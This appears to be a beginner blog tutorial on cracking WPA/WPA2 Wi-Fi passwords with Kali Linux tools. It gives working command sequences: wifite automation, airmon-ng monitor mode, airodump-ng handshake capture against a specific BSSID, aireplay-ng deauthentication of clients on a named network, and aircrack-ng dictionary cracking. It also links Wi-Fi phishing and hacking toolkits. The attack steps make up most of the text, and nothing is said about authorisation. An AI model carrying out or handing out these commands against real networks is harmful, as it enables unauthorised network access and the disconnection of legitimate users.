Dear learners, today you will learn the multiple ways to crack WPA/WPA2 password. It is third article on wireless hacking and click to read the previous articles on wireless hacking.
Handshake is the process which used to communicate between two devices. In this process both the client and server are exchange synchronization and acknowledgment packets to establish the connection and it continuously send the packets each other until the connection is established.
Phishing is that technique which is use to obtain the sensitive data such as : username and passwords, government documents or any important data which is useful for someone.
For an example you have received a email form which contains a link to recover the password and when you will get click on that link they will redirect you on fake or phishing page that look like a real webpage and as soon as will you enter your credentials to recover the password then you will fall into the trap of attacker. Similarly in this tutorial we will obtain the WPA/WPA2 key using phishing attack.
Click here to read the article on wireless phishing attack.
Brute Force Attack
Brute Force is also be used for obtain private user information such as usernames and password but it is guessing technique in which attacker create a dictionary in contains possible passwords and check continuously until correct one is found.
Kali Linux (Tested on 2020.1)
Lets take a look 🙂 !!
Wifite is an in-built tool in kali linux and parrot OS system. It is automated tool and it uses the brute force technique to crack the WEP, WPA, and WPS encrypted networks keys. Just type wifite on your terminal and it will be start.
Note : You should have wifi adapter to fetch the long distance network.
You can see that it has fetched the networks successfully.
Now select the target and see what happens to next.
It uses the wordlist-probable-txt which is given below.
It will automatically capture the handshake and insert a different-2 password using the default dictionary and try to decrypt the key to get the password.
Aircrack-ng is the manual or classic method to crack the password of encrypted network. It also uses brute force technique to crack wireless password.
Execute the below command which will show you wifi adapter that means your adapter is on monitor mode.
airmon-ng start waln0mon
Start the monitor mode to listen all wifi connections nearby you.
After executing the above command it will show you all wifi connection from which you need to select your target and write down the BSSID and channel on notepad.
- -c = is the channel no of access point (target)
- -bssid = is the MAC address of AP (traget)
- –write or -w = where you want to store capture handshake file.
Now, manipulate the details as your need and execute it.
airodump-ng -c 11 --bssid 04:54:32:53:32:43 -w /root/hanshake/hack wlan0mon
Again open new terminal and execute the command given below to disconnect the client form their networks.
- -0 = deauth attack
- 100 = number of deauth packets to be sent
- -a = target AP MAC address
- -e = essid of the target (name)
aireplay-ng -0 100 -a 04:95:E6:77:18:B8 -e Shubham wlan0mon
As you can see in below given image when clients will try to connect again the handshake file will be capture on your given path.
Now execute the below command to crack the password.
Usage 🙂 = aircrack-ng | handshake file | wordlist
aircrack-ng /root/hanshake/hack-01.cap -w /usr/share/dict/wordlist-probable.txt
Great ! you can observe we have received the WPA/WPA2 key.
Similarly you can use the various tool which you will find on Github page such as :
Linset – https://github.com/vk496/linset.git
Wifi-Hacking – https://github.com/ankit0183/Wifi-Hacking
Wifi-hacker – https://github.com/esc0rtd3w/wifi-hacker.git
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.